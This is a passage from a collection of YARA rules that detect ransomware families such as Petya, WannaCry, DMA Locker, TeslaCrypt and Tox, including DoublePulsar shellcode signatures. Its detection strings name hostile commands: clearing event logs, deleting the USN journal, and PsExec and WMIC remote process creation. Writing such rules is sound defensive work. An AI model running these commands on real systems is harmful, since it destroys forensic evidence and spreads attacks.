        $string1 = "RNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $string2 = "keme132.DLL"
        $string3 = "klospad.pdb"

    condition:
        3 of ($string*)
}
rule SVG_LoadURL
{
    meta:
        description = "Detects a tiny SVG file that loads an URL (as seen in CryptoWall malware infections)"
        author = "Florian Roth"
        reference = "http://goo.gl/psjCCc"
        date = "2015-05-24"
        hash1 = "ac8ef9df208f624be9c7e7804de55318"
        hash2 = "3b9e67a38569ebe8202ac90ad60c52e0"
        hash3 = "7e2be5cc785ef7711282cea8980b9fee"
        hash4 = "4e2c6f6b3907ec882596024e55c2b58b"
        score = 50

    strings:
        // closing SVG tag, an inline script block and a JS redirect to an http URL
        $s1 = "</svg>" nocase
        $s2 = "<script>" nocase
        $s3 = "location.href='http" nocase

    condition:
        // the size cap is what keeps large, legitimate SVGs with scripts out
        filesize < 600 and $s1 and $s2 and $s3
}
rule DMALocker4 : ransom
{
    meta:
        Description = "Deteccion del ransomware DMA Locker version 4.0"
        ref = "https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/"
        Author = "SadFud"
        Date = "30/05/2016"
        Hash = "e3106005a0c026fc969b46c83ce9aeaee720df1bb17794768c6c9615f083d5d1"

    strings:
        // Same bytes as the original hex sequence { 21 44 4d 41 4c 4f 43 4b 34 2e 30 },
        // written as a plain ASCII text string.
        $clave = "!DMALOCK4.0"

    condition:
        // a single string, so "all of them" is the same as "$clave"
        all of them
}
   	       
rule Win32Toxic : tox ransomware
{
    meta:
        author = "@GelosSnake"
        date = "2015-06-02"
        description = "https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us"
        // Sample hashes from the generator run; kept verbatim.
        hash0 = "70624c13be4d8a4c1361be38b49cb3eb"
        hash1 = "4f20d25cd3ae2e5c63d451d095d97046"
        hash2 = "e0473434cc83b57c4b579d585d4c4c57"
        hash3 = "c52090d184b63e5cc71b524153bb079e"
        hash4 = "7ac0b49baba9914b234cde62058c96a5"
        hash5 = "048c007de4902b6f4731fde45fa8e6a9"
        hash6 = "238ef3e35b14e304c87b9c62f18953a9"
        hash7 = "8908ccd681f66429c578a889e6e708e1"
        hash8 = "de9fe2b7d9463982cc77c78ee51e4d51"
        hash9 = "37add8d26a35a3dc9700b92b67625fa4"
        hash10 = "a0f30e89a3431fca1d389f90dba1d56e"
        hash11 = "d4d0658302c731003bf0683127618bd9"
        hash12 = "d1d89e1c7066f41c1d30985ac7b569db"
        hash13 = "97d52d7281dfae8ff9e704bf30ce2484"
        hash14 = "2cc85be01e86e0505697cf61219e66da"
        hash15 = "02ecfb44b9b11b846ea8233d524ecda3"
        hash16 = "703a6ebe71131671df6bc92086c9a641"
        hash17 = "df23629b4a4aed05d6a453280256c05a"
        hash18 = "07466ff2572f16c63e1fee206b081d11"
        hash19 = "792a1c0971775d32bad374b288792468"
        hash20 = "fb7fd5623fa6b7791a221fad463223cd"
        hash21 = "83a562aab1d66e5d170f091b2ae6a213"
        hash22 = "99214c8c9ff4653b533dc1b19a21d389"
        hash23 = "a92aec198eee23a3a9a145e64d0250ee"
        hash24 = "e0f7e6b96ca72b9755965b9dac3ce77e"
        hash25 = "f520fc947a6d5edb87aa01510bee9c8d"
        hash26 = "6d7babbe5e438539a9fa2c5d6128d3b4"
        hash27 = "3133c2231fcee5d6b0b4c988a5201da1"
        hash28 = "e5b1d198edc413376e0c0091566198e4"
        hash29 = "50515b5a6e717976823895465d5dc684"
        hash30 = "510389e8c7f22f2076fc7c5388e01220"
        hash31 = "60573c945aa3b8cfaca0bdb6dd7d2019"
        hash32 = "394187056697463eba97382018dfe151"
        hash33 = "045a5d3c95e28629927c72cf3313f4cd"
        hash34 = "70951624eb06f7db0dcab5fc33f49127"
        hash35 = "5def9e3f7b15b2a75c80596b5e24e0f4"
        hash36 = "35a42fb1c65ebd7d763db4abb26d33b0"
        hash37 = "b0030f5072864572f8e6ba9b295615fc"
        hash38 = "62706f48689f1ba3d1d79780010b8739"
        hash39 = "be86183fa029629ee9c07310cd630871"
        hash40 = "9755c3920d3a38eb1b5b7edbce6d4914"
        hash41 = "cb42611b4bed97d152721e8db5abd860"
        hash42 = "5475344d69fc6778e12dc1cbba23b382"
        hash43 = "8c1bf70742b62dec1b350a4e5046c7b6"
        hash44 = "6a6541c0f63f45eff725dec951ec90a7"
        hash45 = "a592c5bee0d81ee127cbfbcb4178afe8"
        hash46 = "b74c6d86ec3904f4d73d05b2797f1cc3"
        hash47 = "28d76fd4dd2dbfc61b0c99d2ad08cd8e"
        hash48 = "fc859ae67dc1596ac3fdd79b2ed02910"
        hash49 = "cb65d5e929da8ff5c8434fd8d36e5dfb"
        hash50 = "888dd1acce29cd37f0696a0284ab740a"
        hash51 = "0e3e231c255a5eefefd20d70c247d5f0"
        hash52 = "e5ebe35d934106f9f4cebbd84e04534b"
        hash53 = "3b580f1fa0c961a83920ce32b4e4e86d"
        hash54 = "d807a704f78121250227793ea15aa9c4"
        hash55 = "db462159bddc0953444afd7b0d57e783"
        hash56 = "2ed4945fb9e6202c10fad0761723cb0e"
        hash57 = "51183ab4fd2304a278e36d36b5fb990c"
        hash58 = "65d602313c585c8712ea0560a655ddeb"
        hash59 = "0128c12d4a72d14bb67e459b3700a373"
        hash60 = "5d3dfc161c983f8e820e59c370f65581"
        hash61 = "d4dd475179cd9f6180d5b931e8740ed6"
        hash62 = "5dd3782ce5f94686448326ddbbac934c"
        hash63 = "c85c6171a7ff05d66d497ad0d73a51ed"
        hash64 = "b42dda2100da688243fe85a819d61e2e"
        hash65 = "a5cf8f2b7d97d86f4d8948360f3db714"
        hash66 = "293cae15e4db1217ea72581836a6642c"
        hash67 = "56c3a5bae3cb1d0d315c1353ae67cf58"
        hash68 = "c86dc1d0378cc0b579a11d873ac944e7"
        hash69 = "54cef0185798f3ec1f4cb95fad4ddd7c"
        hash70 = "eb2eff9838043b67e8024ccadcfe1a8f"
        hash71 = "78778fe62ee28ef949eec2e7e5961ca8"
        hash72 = "e75c5762471a490d49b79d01da745498"
        hash73 = "1564d3e27b90a166a0989a61dc3bd646"
        hash74 = "59ba111403842c1f260f886d69e8757d"
        hash75 = "d840dfbe52a04665e40807c9d960cccc"
        hash76 = "77f543f4a8f54ecf84b15da8e928d3f9"
        hash77 = "bd9512679fdc1e1e89a24f6ebe0d5ad8"
        hash78 = "202f042d02be4f6469ed6f2e71f42c04"
        hash79 = "28f827673833175dd9094002f2f9b780"
        hash80 = "0ff10287b4c50e0d11ab998a28529415"
        hash81 = "644daa2b294c5583ce6aa8bc68f1d21f"
        hash82 = "1c9db47778a41775bbcb70256cc1a035"
        hash83 = "c203bc5752e5319b81cf1ca970c3ca96"
        hash84 = "656f2571e4f5172182fc970a5b21c0e7"
        hash85 = "c17122a9864e3bbf622285c4d5503282"
        hash86 = "f9e3a9636b45edbcef2ee28bd6b1cfbb"
        hash87 = "291ff8b46d417691a83c73a9d3a30cc9"
        hash88 = "1217877d3f7824165bb28281ccc80182"
        hash89 = "18419d775652f47a657c5400d4aef4a3"
        hash90 = "04417923bf4f2be48dd567dfd33684e2"
        hash91 = "31efe902ec6a5ab9e6876cfe715d7c84"
        hash92 = "a2e4472c5097d7433b91d65579711664"
        hash93 = "98854d7aba1874c39636ff3b703a1ed1"
        hash94 = "5149f0e0a56b33e7bbed1457aab8763f"
        hash95 = "7a4338193ce12529d6ae5cfcbb1019af"
        hash96 = "aa7f37206aba3cbe5e11d336424c549a"
        hash97 = "51cad5d45cdbc2940a66d044d5a8dabf"
        hash98 = "85edb7b8dee5b60e3ce32e1286207faa"
        hash99 = "34ca5292ae56fea78ba14abe8fe11f06"
        hash100 = "154187f07621a9213d77a18c0758960f"
        hash101 = "4e633f0478b993551db22afddfa22262"
        hash102 = "5c50e4427fe178566cada96b2afbc2d4"
        hash103 = "263001ac21ef78c31f4ca7ad2e7f191d"
        hash104 = "53fd9e7500e3522065a2dabb932d9dc5"
        hash105 = "48043dc55718eb9e5b134dac93ebb5f6"
        hash106 = "ca19a1b85363cfed4d36e3e7b990c8b6"
        hash107 = "41b5403a5443a3a84f0007131173c126"
        hash108 = "6f3833bc6e5940155aa804e58500da81"
        hash109 = "9bd50fcfa7ca6e171516101673c4e795"
        hash110 = "6d52ba0d48d5bf3242cd11488c75b9a7"
        hash111 = "c52afb663ff4165e407f53a82e34e1d5"
        hash112 = "5a16396d418355731c6d7bb7b21e05f7"
        hash113 = "05559db924e71cccee87d21b968d0930"
        hash114 = "824312bf8e8e7714616ba62997467fa8"
        hash115 = "dfec435e6264a0bfe47fc5239631903c"
        hash116 = "3512e7da9d66ca62be3418bead2fb091"
        hash117 = "7ad4df88db6f292e7ddeec7cf63fa2bc"
        hash118 = "d512da73d0ca103df3c9e7c074babc99"
        hash119 = "c622b844388c16278d1bc768dcfbbeab"
        hash120 = "170ffa1cd19a1cecc6dae5bdd10efb58"
        hash121 = "3a19c91c1c0baa7dd4a9def2e0b7c3e9"
        hash122 = "3b7ce3ceb8d2b85ab822f355904d47ce"
        hash123 = "a7bac2ace1f04a7ad440bd2f5f811edc"
        hash124 = "66594a62d8c98e1387ec8deb3fe39431"
        hash125 = "a1add9e5d7646584fd4140528d02e4c3"
        hash126 = "11328bbf5a76535e53ab35315321f904"
        hash127 = "048f19d79c953e523675e96fb6e417a9"
        hash128 = "eb65fc2922eafd62defd978a3215814b"
        hash129 = "51cc9987f86a76d75bf335a8864ec250"
        hash130 = "a7f91301712b5a3cc8c3ab9c119530ce"
        hash131 = "de976a5b3d603161a737e7b947fdbb9a"
        hash132 = "288a3659cc1aec47530752b3a31c232b"
        hash133 = "91da679f417040558059ccd5b1063688"
        hash134 = "4ce9a0877b5c6f439f3e90f52eb85398"
        hash135 = "1f9e097ff9724d4384c09748a71ef99d"
        hash136 = "7d8a64a94e71a5c24ad82e8a58f4b7e6"
        hash137 = "db119e3c6b57d9c6b739b0f9cbaeb6fd"
        hash138 = "52c9d25179bf010a4bb20d5b5b4e0615"
        hash139 = "4b9995578d51fb891040a7f159613a99"
        sample_filetype = "exe"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"

    strings:
        // Auto-generated patterns (see yaragenerator above): repetitive punctuation
        // runs rather than semantically meaningful tokens. $pat2 is only six bytes,
        // so the 2-of-3 threshold rather than any single string carries the match.
        $pat0 = "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<"
        $pat1 = "t;<<t;<<t<<<t<<"
        $pat2 = ">>><<<"

    condition:
        // identifiers renamed from $string0..2; "2 of them" is unchanged
        2 of ($pat*)
}
rule Ransom_Alpha
{
    meta:
        description = "Regla para detectar Ransom.Alpha (posibles falsos penos)"
        author = "CCN-CERT"
        version = "1.0"

    strings:
        // "Read Me (How Dec" encoded as UTF-16LE, without the trailing 00 of the
        // last character -- kept as hex so the match width stays exactly as written.
        $a = { 52 00 65 00 61 00 64 00 20 00 4D 00 65 00 20 00 28 00 48 00 6F 00 77 00 20 00 44 00 65 00 63 }

    condition:
        // single string, so this equals "$a"
        all of them
}
rule Ransom_Crypren
{
    meta:
        weight = 1
        Author = "@pekeinfo"
        reference = "https://github.com/pekeinfo/DecryptCrypren"

    strings:
        // HTML fragment of the ransom note
        $a = "won't be able to recover your files anymore.</p>"
        // code-byte pattern; the ?? wildcards skip address/immediate operands
        $b = {6A 03 68 ?? ?? ?? ?? B9 74 F1 AE 00 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 98 3A 00 00 FF D6 6A 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ??}
        // plain-text ransom instruction
        $c = "Please restart your computer and wait for instructions for decrypting your files"

    condition:
        // any single string is enough (same as "any of them")
        $a or $b or $c
}
rule DMALocker : ransom
{
    meta:
        Description = "Deteccion del ransomware DMA Locker desde la version 1.0 a la 4.0"
        ref = "https://blog.malwarebytes.org/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/"
        Author = "SadFud"
        Date = "30/05/2016"

    strings:
        // Original hex sequences rewritten as the equivalent ASCII text strings.
        // Note that $dos is a prefix of $tres and $cuatro, so under "any of them"
        // the two versioned markers never match without $dos matching too.
        $uno = "ABCXYZ11"
        $dos = "!DMALOCK"
        $tres = "!DMALOCK3.0"
        $cuatro = "!DMALOCK4.0"

    condition:
        $uno or $dos or $tres or $cuatro
}
   	       
// https://otx.alienvault.com/pulse/596f2fc5fbe8a278fe3af767
rule TeslaCrypt
{
    meta:
        description = "Regla para detectar Tesla con md5"
        author = "CCN-CERT"
        version = "1.0"

    strings:
        // Decodes to "Now it's %I:%M%p." 00 00 00 "val is %d" 0A 00 00 -- two
        // adjacent format strings with their padding. NOTE(review): these look like
        // generic C-runtime sample strings, so false positives are plausible; verify.
        $fmt = { 4E 6F 77 20 69 74 27 73 20 25 49 3A 25 4D 25 70 2E 00 00 00 76 61 6C 20 69 73 20 25 64 0A 00 00 }

    condition:
        // the original used an anonymous "$" string with "all of them"; one string
        // either way, so the rule fires exactly when this sequence is present
        $fmt
}
// https://otx.alienvault.com/pulse/59525e7a95270e240c055ead
rule DoublePulsarXor_Petya
{
    meta:
        description = "Rule to hit on the XORed DoublePulsar shellcode"
        author = "Patrick Jones"
        company = "Booz Allen Hamilton"
        reference1 = "https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html"
        reference2 = "https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf"
        date = "2017-06-28"
        hash = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745"
        hash = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1"

    strings:
        // Byte sequence as it appears in the sample (already XOR-encoded per the
        // description), so it matches the stored form, not the decoded shellcode.
        $DoublePulsarXor_Petya = { FD 0C 8C 5C B8 C4 24 C5 CC CC CC 0E E8 CC 24 6B CC CC CC 0F 24 CD CC CC CC 27 5C 97 75 BA CD CC CC C3 FE }

    condition:
        // single string, so this equals "$DoublePulsarXor_Petya"
        all of them
}
rule DoublePulsarDllInjection_Petya
{
    meta:
        description = "Rule to hit on the XORed DoublePulsar DLL injection shellcode"
        author = "Patrick Jones"
        company = "Booz Allen Hamilton"
        reference1 = "https://www.boozallen.com/s/insight/publication/the-petya-ransomware-outbreak.html"
        reference2 = "https://www.boozallen.com/content/dam/boozallen_site/sig/pdf/white-paper/rollup-of-booz-allen-petya-research.pdf"
        date = "2017-06-28"
        hash = "027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745"
        hash = "64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1"

    strings:
        // Stored (XOR-encoded) form of the sequence, matching the companion
        // DoublePulsarXor_Petya rule's approach.
        $DoublePulsarDllInjection_Petya = { 45 20 8D 93 8D 92 8D 91 8D 90 92 93 91 97 0F 9F 9E 9D 99 84 45 29 84 4D 20 CC CD CC CC 9B 84 45 03 84 45 14 84 45 49 CC 33 33 33 24 77 CC CC CC 84 45 49 C4 33 33 33 24 84 CD CC CC 84 45 49 DC 33 33 33 84 47 49 CC 33 33 33 84 47 41 }

    condition:
        // single string, so this equals "$DoublePulsarDllInjection_Petya"
        all of them
}
rule ransomware_PetrWrap
{
    meta:
        copyright = "Kaspersky Lab"
        description = "Rule to detect PetrWrap ransomware samples"
        reference = "https://securelist.com/schroedingers-petya/78870/"
        last_modified = "2017-06-27"
        author = "Kaspersky Lab"
        hash = "71B6A493388E7D0B40C83CE903BC6B04"
        version = "1.0"

    strings:
        // embedded base64 blob (UTF-16LE, whole-word)
        $a1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcqYLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgqCXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu" fullword wide
        // targeted file-extension list (UTF-16LE, whole-word)
        $a2 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls" fullword wide
        // ransom-screen text and payment/contact identifiers
        $a3 = "DESTROY ALL OF YOUR DATA PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" fullword ascii
        $a4 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" fullword ascii
        $a5 = "wowsmith123456posteo.net." fullword wide

    condition:
        // MZ header, under ~1 MB, and at least one of the five artefacts
        uint16(0) == 0x5A4D and filesize < 1000000 and 1 of ($a*)
}
rule Petya_Ransomware
{
    meta:
        description = "Detects Petya Ransomware"
        author = "Florian Roth"
        reference = "http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html"
        date = "2016-03-24"
        hash = "26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739"

    strings:
        // Mandatory: the sample carries a WinRAR SFX module description.
        $a1 = "<description>WinRAR SFX module</description>" fullword ascii

        // Supporting strings; three of the five are required.
        $s1 = "BX-Proxy-Manual-Auth" fullword wide
        $s2 = "<!--The ID below indicates application support for Windows 10 -->" fullword ascii
        $s3 = "X-HTTP-Attempts" fullword wide
        $s4 = "@CommandLineMode" fullword wide
        $s5 = "X-Retry-After" fullword wide

    condition:
        $a1
        and uint16(0) == 0x5a4d
        and filesize < 500KB
        and 3 of ($s*)
}
rule FE_CPE_MS17_010_RANSOMWARE
{
    meta:
        version = "1.1"
        //filetype="PE"
        author = "Ian.Ahl@fireeye.com @TekDefense, Nicholas.Carr@mandiant.com @ItsReallyNick"
        date = "2017-06-27"
        description = "Probable PETYA ransomware using ETERNALBLUE, WMIC, PsExec"
        reference = "https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html"

    strings:
        // DRIVE USAGE -- raw-disk device names, admin share and drive-enumeration APIs
        $dmap01 = "\\\\.\\PhysicalDrive" nocase ascii wide
        $dmap02 = "\\\\.\\PhysicalDrive0" nocase ascii wide
        $dmap03 = "\\\\.\\C:" nocase ascii wide
        $dmap04 = "TERMSRV" nocase ascii wide
        $dmap05 = "\\admin$" nocase ascii wide
        $dmap06 = "GetLogicalDrives" nocase ascii wide
        $dmap07 = "GetDriveTypeW" nocase ascii wide

        // RANSOMNOTE -- fake CHKDSK screen, payment text, contact and wallet
        $msg01 = "WARNING: DO NOT TURN OFF YOUR PC!" nocase ascii wide
        $msg02 = "IF YOU ABORT THIS PROCESS" nocase ascii wide
        $msg03 = "DESTROY ALL OF YOUR DATA!" nocase ascii wide
        $msg04 = "PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" nocase ascii wide
        $msg05 = "your important files are encrypted" ascii wide
        $msg06 = "Your personal installation key" nocase ascii wide
        $msg07 = "worth of Bitcoin to following address" nocase ascii wide
        $msg08 = "CHKDSK is repairing sector" nocase ascii wide
        $msg09 = "Repairing file system on " nocase ascii wide
        $msg10 = "Bitcoin wallet ID" nocase ascii wide
        $msg11 = "wowsmith123456@posteo.net" nocase ascii wide
        $msg12 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" nocase ascii wide
        $msg_pcre = /(en|de)crypt(ion|ed\.)/

        // FUNCTIONALITY, APIS -- mostly generic imports; 9 of 15 are required so
        // this group alone says little about a binary, the other groups carry the weight
        $functions01 = "need dictionary" nocase ascii wide
        $functions02 = "comspec" nocase ascii wide
        $functions03 = "OpenProcessToken" nocase ascii wide
        $functions04 = "CloseHandle" nocase ascii wide
        $functions05 = "EnterCriticalSection" nocase ascii wide
        $functions06 = "ExitProcess" nocase ascii wide
        $functions07 = "GetCurrentProcess" nocase ascii wide
        $functions08 = "GetProcAddress" nocase ascii wide
        $functions09 = "LeaveCriticalSection" nocase ascii wide
        $functions10 = "MultiByteToWideChar" nocase ascii wide
        $functions11 = "WideCharToMultiByte" nocase ascii wide
        $functions12 = "WriteFile" nocase ascii wide
        $functions13 = "CoTaskMemFree" nocase ascii wide
        $functions14 = "NamedPipe" nocase ascii wide
        $functions15 = "Sleep" nocase ascii wide // imported, not in strings

        // COMMANDS
        //  -- Clearing event logs & USNJrnl (anti-forensics; useful on its own as a hunting pivot)
        $cmd01 = "wevtutil cl Setup" ascii wide nocase
        $cmd02 = "wevtutil cl System" ascii wide nocase
        $cmd03 = "wevtutil cl Security" ascii wide nocase
        $cmd04 = "wevtutil cl Application" ascii wide nocase
        $cmd05 = "fsutil usn deletejournal" ascii wide nocase
        // -- Scheduled task
        $cmd06 = "schtasks " nocase ascii wide
        $cmd07 = "/Create /SC " nocase ascii wide
        $cmd08 = " /TN " nocase ascii wide
        $cmd09 = "at %02d:%02d %ws" nocase ascii wide
        $cmd10 = "shutdown.exe /r /f" nocase ascii wide
        // -- Sysinternals/PsExec and WMIC
        $cmd11 = "-accepteula -s" nocase ascii wide
        $cmd12 = "wmic"    // no modifiers: case-sensitive, ASCII only (unlike its neighbours)
        $cmd13 = "/node:" nocase ascii wide
        $cmd14 = "process call create" nocase ascii wide

    condition:
        // (uint16(0) == 0x5A4D)
        // all four groups must reach their threshold; the order is cosmetic
        7 of ($cmd*)
        and 9 of ($functions*)
        and 3 of ($dmap*)
        and 2 of ($msg*)
}
rule Ransom_Petya
{
    meta:
        description = "Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015"
        author = "CCN-CERT"
        version = "1.0"

    strings:
        // Three code-byte sequences taken from the sample named in the description.
        $a1 = { C1 C8 14 2B F0 03 F0 2B F0 03 F0 C1 C0 14 03 C2 }
        $a2 = { 46 F7 D8 81 EA 5A 93 F0 12 F7 DF C1 CB 10 81 F6 }
        $a3 = { 0C 88 B9 07 87 C6 C1 C3 01 03 C5 48 81 C3 A3 01 00 00 }

    condition:
        // every sequence is an $a* string, so this equals "all of them"
        all of ($a*)
}
// https://otx.alienvault.com/pulse/5915db384da2585b4feaf2f6
rule WannaDecryptor: WannaDecryptor
{
    meta:
        description = "Detection for common strings of WannaDecryptor"

    strings:
        // helper executables and .wnry resource names dropped by the sample
        $id1 = "taskdl.exe"
        $id2 = "taskse.exe"
        $id3 = "r.wnry"
        $id4 = "s.wnry"
        $id5 = "t.wnry"
        $id6 = "u.wnry"
        $id7 = "msg/m_"

    condition:
        // all strings share the $id prefix, so this equals "3 of them"
        3 of ($id*)
}
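rule Wanna_Cry_Ransomware_Generic
{
    meta:
        description = "Detects WannaCry Ransomware on Disk and in Virtual Page"
        author = "US-CERT Code Analysis Team"
        reference = "not set"
        date = "2017/05/12"
        hash0 = "4DA1F312A214C07143ABEEAFB695D904"

    strings:
        $s0 = {410044004D0049004E0024}    // "ADMIN$" as UTF-16LE
        $s1 = "WannaDecryptor"
        $s2 = "WANNACRY"
        $s3 = "Microsoft Enhanced RSA and AES Cryptographic"
        $s4 = "PKS"    // only three bytes; weak on its own, used inside an "and" group below
        $s5 = "StartTask"
        $s6 = "wcry@123"
        $s7 = {2F6600002F72}    // "/f" 00 00 "/r"
        $s8 = "unzip 0.15 Copyrigh"
        $s9 = "Global\\WINDOWS_TASKOSHT_MUTEX"
        $s10 = "Global\\WINDOWS_TASKCST_MUTEX"
        $s11 = {7461736B736368652E657865000000005461736B5374617274000000742E776E7279000069636163}    // "tasksche.exe" 00*4 "TaskStart" 00*3 "t.wnry" 00 00 "icac"
        $s12 = {6C73202E202F6772616E742045766572796F6E653A46202F54202F43202F5100617474726962202B68}    // "ls . /grant Everyone:F /T /C /Q" 00 "attrib +h"
        $s13 = "WNcry@2ol7"
        // The original also declared $s14 = "wcry@123", a byte-for-byte duplicate
        // of $s6; it has been removed and the condition references $s6 instead,
        // which matches exactly the same files.
        $s15 = "Global\\MsWinZonesCacheCounterMutexA"

    condition:
        // Parentheses spell out the precedence the original relied on ("and"
        // binds tighter than "or"). Any one of these alternatives suffices.
        // Because $s6 alone is an alternative, the ($s4 .. $s7) group can never
        // be the deciding one; it is kept for fidelity with the published rule.
        ($s0 and $s1 and $s2 and $s3)
        or ($s4 and $s5 and $s6 and $s7)
        or ($s8 and $s9 and $s10)
        or ($s11 and $s12)
        or $s13
        or $s6
        or $s15
}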
rule WannaCry_Ransomware_Gen
{
    meta:
        description = "Detects WannaCry Ransomware"
        author = "Florian Roth (based on rule by US CERT)"
        reference = "https://www.us-cert.gov/ncas/alerts/TA17-132A"
        date = "2017-05-12"
        hash1 = "9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05"
        hash2 = "8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df"
        hash3 = "4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359"

    strings:
        // Two placeholder tokens plus three SMB dialect strings; all five are required.
        $s1 = "__TREEID__PLACEHOLDER__" fullword ascii
        $s2 = "__USERID__PLACEHOLDER__" fullword ascii
        $s3 = "Windows for Workgroups 3.1a" fullword ascii
        $s4 = "PC NETWORK PROGRAM 1.0" fullword ascii
        $s5 = "LANMAN1.0" fullword ascii

    condition:
        uint16(0) == 0x5a4d
        and filesize < 5000KB
        and $s1 and $s2 and $s3 and $s4 and $s5
}
rule lazaruswannacry
{
    meta:
        description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
        date = "2017-05-15"
        reference = "https://twitter.com/neelmehta/status/864164081116225536"
        author = "Costin G. Raiu, Kaspersky Lab"
        version = "1.0"
        hash = "9c7c7149387a1c79679a87dd1ba755bc"
        hash = "ac21c8ad899727137c4b94458d7aa8d8"

    strings:
        // code-byte sequence shared by both families
        $a1 = { 51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75 04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01 46 56 E8 }
        // a table of 16-bit little-endian values ending in FF FE; presumably a
        // protocol identifier list (the reference discusses shared code) -- confirm
        $a2 = { 03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00 10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00 44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00 68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00 FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0 08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0 10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0 2B C0 2C C0 FF FE }

    condition:
        // MZ header, under 15,000,000 bytes, and both sequences present
        uint16(0) == 0x5A4D and filesize < 15000000 and $a1 and $a2
}
rule Wanna_Sample_4da1f312a214c07143abeeafb695d904: Wanna_Sample_4da1f312a214c07143abeeafb695d904
{
    meta:
        description = "Specific sample match for WannaCryptor"
        MD5 = "4da1f312a214c07143abeeafb695d904"
        SHA1 = "b629f072c9241fd2451f1cbca2290197e72a8f5e"
        SHA256 = "aee20f9188a5c3954623583c6b0e6623ec90d5cd3fdec4e1001646e27664002c"
        INFO = "Looks for offsets of r.wry and s.wry instances"

    strings:
        $rwnry = { 72 2e 77 72 79 }    // "r.wry"
        $swnry = { 73 2e 77 72 79 }    // "s.wry"

    condition:
        // Fixed-offset match: this pins one specific build (the hashes above) and
        // will not generalise to recompiled or repacked variants.
        $swnry at 88656
        and $rwnry at 88195
        and $rwnry at 4495639
}
rule ransom_telefonica : TELEF
{
    meta:
        author = "Jaume Martin <@Xumeiquer>"
        description = "Ransmoware Telefonica"
        date = "2017-05-13"
        reference = "http://www.elmundo.es/tecnologia/2017/05/12/59158a8ce5fdea194f8b4616.html"
        md5 = "7f7ccaa16fb15eb1c7399d422f8363e8"
        sha256 = "2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd"

    strings:
        $a = "RegCreateKeyW" wide ascii nocase
        $b = "cmd.exe /c"
        // three payment addresses and the dropped helper name
        $c = "115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn" ascii
        $d = "12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw" ascii
        $e = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94" ascii
        $f = "tasksche.exe"

    condition:
        // MZ header, $a present, and every other string's first occurrence
        // located after the first occurrence of $a (an ordering constraint,
        // not just presence).
        uint16(0) == 0x5A4D
        and $a
        and for all of ($b, $c, $d, $e, $f) : ( @ > @a )
}
rule WannCry_m_vbs
{
    meta:
        description = "Detects WannaCry Ransomware VBS"
        author = "Florian Roth"
        reference = "https://goo.gl/HG2j5T"
        date = "2017-05-12"
        hash1 = "51432d3196d9b78bdc9867a77d601caffd4adaa66dcac944a5ba0b3112bbea3b"

    strings:
        // shortcut creation pointing at a path of the form C:\@...
        $x1 = ".TargetPath = \"C:\\@" ascii
        $x2 = ".CreateShortcut(\"C:\\@" ascii
